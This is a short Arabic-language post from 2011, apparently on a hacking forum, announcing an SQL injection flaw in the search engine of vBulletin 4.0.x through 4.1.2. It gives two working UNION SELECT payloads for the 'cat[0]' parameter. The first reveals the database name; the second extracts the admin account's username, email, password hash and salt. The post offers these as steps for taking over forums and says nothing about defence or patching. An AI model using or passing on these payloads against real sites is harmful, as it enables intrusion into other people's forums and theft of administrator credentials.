:: vBspiders Professional Network :: - عرض مشاركة واحدة - vBulletin 4.0.x => 4.1.2 SQL Injection Vulnerability

KaLa$nikoV · 05-22-2011, 05:12 AM

السلام عليكم ورحمه الله وبركاته

الموضوع واضح من العنوان ثغره في المنتديات اصدار 4 لحتى اصدار 4.1.2

الثغره بمحرك البحث

نروح محرك البحث ونكتب استعلام الحقن

اقتباس


	&cat[0]=1) UNION SELECT database()#

يظهر لنا الداتابيز
وهيك نجيب باس الادمن

اقتباس


	&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#

وهذا فيديو شرح

مكتشف الثغره D4rkB1t

بالتوفيق

المصدر: :: vBspiders Professional Network ::

vBulletin 4>0>x => 4>1>2 SQL Injection Vulnerability